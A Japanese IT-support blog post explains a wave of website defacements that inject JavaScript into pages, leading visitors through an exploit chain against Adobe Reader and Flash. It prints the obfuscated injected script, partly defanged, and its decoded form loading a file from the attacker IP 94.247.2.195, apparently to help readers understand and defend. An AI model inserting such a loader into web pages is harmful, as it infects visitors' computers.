ITサポーターズの仲間たち    mushi

IT関連のサポートに携わる変人が微弱な電波を発してます。
ビビビビビッ!

URL変更のお知らせとお願い 当サイトのドメインが変更となりました
http://zxvf.homeip.net から http://zxvf.stzo.net に変更となりました。
当サイトにリンクしていただいている方々にはご面倒ですが変更をお願いいたします。(2014/4/7)

注意!WEBページの改ざん大量


注意!WEBページの改ざん大量 今はアップデートしていれば大丈夫だけど



今はアップデートしていれば大丈夫だけど

いまあちこちのサイトでページが改ざんされ、ページ本体や .js (JavaScript)ファイルが改ざんされJavaScriptのコードが埋め込まれている。
このページを開くと自分のPCの脆弱性が修正されていないと感染してしまうというもの。
攻撃対象はAdobeのReaderとflashPlayerだ。
これをどちらもインストールしていなければ何も心配はいらないが、この2つはそうはいかないだろう。
メーカーPCならはじめから入っている。

簡単にこの仕組み
・ハッカーが無差別にサーバに対してXSS(クロスサイトスクリプティング)をしかける。
(サーバの脆弱性を突く通常あり得ないURLのリクエストを発行)
・サーバはリクエストを処理しようとするがエラー、その瞬間に穴が開き侵入しサーバのコントロール権限を取得
・侵入してサーバの状態やファイルを確認しJavaScriptのコードを埋め込む。
この時点ではページの表示自体は変更していないので気付きにくい。

その後ユーザがページを表示するとJavaScriptが実行され、瞬間的に以下の動作で感染。
94.247.2.195 の改変した jquery.js を実行。次のアクセス先へ誘導
94.247.2.195 の /?id=100 や /?id=101 にアクセスさせる。
(ここでOSや各種バージョンなど確認されそれに合わせて次のアクセス先への誘導)
94.247.2.195 の /?id=2 や /?id=3 に誘導され脆弱性を突かれバッファオーバーフローを引き起こす。
(2がPDFファイル、3がswfファイル)
94.247.2.195 の /?id=10 から/開いた穴へランダムな名前の xx.exe をダウンロードし実行感染する。

なんでこんな面倒な事をしているかというと、確実に感染させるための手順と、
感染までのプロセスでウイルス対策に引っかからないよう考えられている。

まずページに埋め込まれるコードを見てみよう。(scr の3文字抜かして書いています)
<script language=javascript><!--
document.write(unescape('nIc%3Cqcipm5tA5%20sD24rc%3D%2F1NL
%2FTvh9qc4%2Em521NL47ae%2E2%2E1m59ae5qc%2FaejqcqupweD24rqcypw
%2EjTvhsqc%3E%3C%2FscrTvhiD24pqct%3E').replace(/A5|m5|ae|pw|
qc|D24|Tvh|1NL|nIc/g,""));
--></script>

このような文字列のコードを埋め込まれる
解読すると、最後の方の replace という関数の部分で書かれている文字列 | で区切られている短い単語を unescape 関数の長い文字列からそれぞれ削除。
するとこのようになる
document.write(unescape('%3Cipt%20src%3D%2F%2F94%2E247%2E2%2E195%2Fjquery%2Ejs%3E%3C%2Fscript%3E')
これをutf-8でコードしてやると、
<ipt src=//94.247.2.195/jquery.js></script>
となる。このように実はただのスクリプト実行のタグなのだ。
(あらかじめ3文字抜かしていたのが先頭の scr なので、実際は ipt ではなく script となる)
これだと簡単にわかってしまうのでこのように文字列をランダムに置き換えてウイルスのチェックにかかりにくくしている。

この仕組みを先の順番で言うと /?id=10 に誘導されるまで使っている。
実際に攻撃すするpdfやflashのファイルやexeファイルに至るまでは、ただのURLのリンク、しかも暗号化されているのでウイルスとの判定がしにくい。
そのアドレスを判定してもIP変えられてしまえば全く意味がない。
そして脆弱性のないマシンには攻撃のコードは送ってこないのでウイルス対策ベンダーも検体の入手が困難なため解析がしにくい。

ただ安心して欲しいのは、脆弱性のないマシンには何も送り込んでこないこと。
厳密に言うと実はクッキーだけ「このマシンは攻撃対象外」と目印をつけてくれる。
なので対策としては、
AdobeReaderとflashを最新に更新しておく。

そう、いつもちゃんとアップデートしていれば今回の件でいえば安心ってこと。

危ないのはReaderとか使わないPC初心者。使わないんだから更新もできないよね。
他にもワードとか他のアプリケーションでもこのような手法が使えるので心配だね。

< 過去の記事 [ 12月の 全てのトピック リスト ] 新しい記事 >
via IPv4

twitter

●→ トップページ

12/17(Sun) 11:18:23

サイト内検索

 

トピックのカテゴリー

全てのトピック
今日の思考回路
趣味について
ニュース!
Technical
Linux
OSX
その他いろいろ

みんなのリンク

全てのリンク
ニュース
アミューズメント
生活
Tools
Windows
OS X
Technical
その他のリンク
MACアドレスで位置情報検索


Archives




新しいトピック
最新:05/08 18:22


Valid XHTML 1.0 Transitional

Syndicate this site(XML)

RSS1.0(RDF)

RSS2.0(RSS)

SpecialThanks
011370031

....   

Copyright (C) 2005-2017 Amato. All rights reserved.